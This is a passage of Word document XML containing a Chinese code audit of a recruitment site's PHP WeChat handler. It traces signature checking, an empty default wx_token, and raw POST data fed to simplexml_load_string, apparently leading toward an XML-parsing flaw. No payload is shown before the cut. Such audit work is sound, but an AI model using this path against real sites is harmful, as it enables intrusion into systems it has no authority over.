                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="111"/>
                    <w:ind w:right="1704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 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refResume(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before="1"/>
                    <w:ind w:left="915"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia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($EventKey==</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>推荐职位</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="111"/>
                    <w:ind w:right="1704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 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recJob(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before="1"/>
                    <w:ind w:left="915"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia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($EventKey=='</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>职位搜索</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>'){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footerReference w:type="default" r:id="rId28"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="5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33" type="#_x0000_t202" style="width:319.25pt;height:326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292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                      <w:sz w:val="29"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="307" w:lineRule="auto"/>
                    <w:ind w:right="-1" w:firstLine="914"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$centerStr =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:spacing w:val="-52"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>"&lt;Content&gt;&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>![</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>CDATA[</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>直接回复城市、职位、公司名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称等关键字搜索您需要的职位信息。</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">\n </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:spacing w:val="-13"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>如：【经理】、【南京</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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pacing w:val="-11"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>经理】、【南京</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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nsolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">xx </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>公司】</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>]]&gt;&lt;/Content&gt;";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spacing w:before="148"/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$this-&gt;MsgType = 'text';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:right="1704"/>
                    <w:jc w:val="righ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115"/>
                    <w:ind w:left="1039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115" w:line="369" w:lineRule="auto"/>
                    <w:ind w:left="3663" w:right="863" w:hanging="735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($MsgType=='text'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>){ if($keyword){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="3663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$centerStr =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="1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searchJob(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$keyword);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left="1039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115"/>
                    <w:ind w:right="426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115"/>
                    <w:ind w:left="2928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 xml:space="preserve">$topStr = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>sprintf(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$topTpl,</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="113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$fromUsername, $toUsername, $times, $this-&gt;MsgType);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:left="2928" w:right="-1"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>echo</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:spacing w:val="-26"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$topStr.$centerStr.$bottomStr;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="115"/>
                    <w:ind w:right="786"/>
                    <w:jc w:val="center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115"/>
                    <w:ind w:left="1831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115"/>
                    <w:ind w:left="915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9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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80020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="119"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>先来慢慢分析一下定义一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>$MsgType</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>后面判断</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> echostr </w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>否通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:t>方式提交，如果是则调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> valid()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>这里先不往下读，先跟进</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> valid()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是做什么的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:19.15pt;width:319.25pt;height:130.4pt;z-index:248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4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private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function valid()</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80"/>
                    <w:ind w:left="31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78" w:line="319" w:lineRule="auto"/>
                    <w:ind w:left="735" w:right="237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$echoStr = $_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GET[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"echostr"]; </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:w w:val="95"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:t>if($this-&gt;checkSignature()){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="319" w:lineRule="auto"/>
                    <w:ind w:left="915" w:right="383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echo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$echoStr; exit;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="245" w:lineRule="exact"/>
                    <w:ind w:left="73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80"/>
                    <w:ind w:left="31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031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:297.9pt;width:319.25pt;height:32.6pt;z-index:2536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4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private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function checkSignature()</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80"/>
                    <w:ind w:left="91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/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>:482</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii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10030" type="#_x0000_t202" style="width:319.25pt;height:293.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40"/>
                    <w:ind w:left="84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$signature = $_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GET[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"signature"];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="78"/>
                    <w:ind w:left="84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$timestamp = $_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GET[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"timestamp"];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="80"/>
                    <w:ind w:left="84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$nonce = $_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GET[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"nonce"];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="23"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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$token = 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config[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'wx_token'];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 xml:space="preserve">$tmpArr = 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array(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$token, $timestamp,</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8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$nonce);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="78"/>
                    <w:ind w:left="18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sort(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$tmpArr, SORT_STRING);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 xml:space="preserve">$tmpStr = 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implode(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$tmpArr );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 xml:space="preserve">$tmpStr = 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sha1(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$tmpStr );</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="23"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4927"/>
                    </w:tabs>
                    <w:ind w:left="18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$tmpStr</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas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==</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas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$signature</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas"/>
                      <w:sz w:val="21"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>&amp;&amp;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="8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$token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!=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''){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="78"/>
                    <w:ind w:left="1690" w:right="1196"/>
                    <w:jc w:val="center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return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true;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}else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80"/>
                    <w:ind w:left="1690" w:right="1081"/>
                    <w:jc w:val="center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return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 xml:space="preserve"> false;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80"/>
                    <w:ind w:left="91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spacing w:line="292" w:lineRule="exact"/>
        <w:ind w:left="83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主要是检查签名，还有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">$token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是否不为空。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而这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> wx_token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默认是为空的，所以这里有一项条件不成功，则</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反回</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="464"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:37.2pt;width:319.25pt;height:180.1pt;z-index:2584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$postStr = $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GLOBALS[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"HTTP_RAW_POST_DATA"];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="1690" w:right="560"/>
                    <w:jc w:val="center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(!empty($postStr))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="816"/>
                    <w:jc w:val="center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18" w:line="360" w:lineRule="exact"/>
                    <w:ind w:right="1011" w:firstLine="2956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$postObj = simplexml_load_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string(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$postStr, 'SimpleXMLElement', LIBXML_NOCDATA);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="342" w:lineRule="exact"/>
                    <w:ind w:left="295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$fromUsername =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$postObj-&gt;FromUserName;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:left="295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$toUsername =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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$postObj-&gt;ToUserName;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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以这里就跟进完了，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>valid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个方法是用来检查签名的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然后继续往下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:ind w:right="372"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:-53.85pt;width:319.25pt;height:244.1pt;z-index:-368344;mso-position-horizontal-relative:page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ind w:left="295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$keyword =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trim(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$postObj-&gt;Content);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="360" w:lineRule="exact"/>
                    <w:ind w:left="295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 xml:space="preserve">$times =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time(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);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="361" w:lineRule="exact"/>
                    <w:ind w:left="2957" w:right="-13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$MsgType = $postObj-&gt;MsgType</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="40"/>
                    <w:ind w:left="295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$topTpl = "&lt;xml&gt;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微软雅黑"/>
                      <w:sz w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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&lt;ToUserName&gt;&lt;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![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CDATA[%s]]&gt;&lt;/ToUserName&gt;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微软雅黑"/>
                      <w:sz w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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&lt;FromUserName&gt;&lt;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![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CDATA[%s]]&gt;&lt;/FromUserName&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="7"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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&lt;CreateTime&gt;%s&lt;/CreateTime&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="9"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:sz w:val="28"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr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&lt;MsgType&gt;&lt;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![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CDATA[%s]]&gt;&lt;/MsgType&gt;";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微软雅黑"/>
                      <w:sz w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:ind w:right="2023" w:firstLine="2956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$bottomStr = "&lt;FuncFlag&gt;0&lt;/FuncFlag&gt;&lt;/xml&gt;";</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>;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4"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>GLOBALS[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>“HTTP_RAW_POST_DATA”]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00623EEB" w:rsidRPr="00623EEB" w:rsidRDefault="00623EEB">
      <w:pPr>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsiaTheme="minorEastAsia" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="400" w:firstLine="420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所以这里获取的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> post </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>传给了变量</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
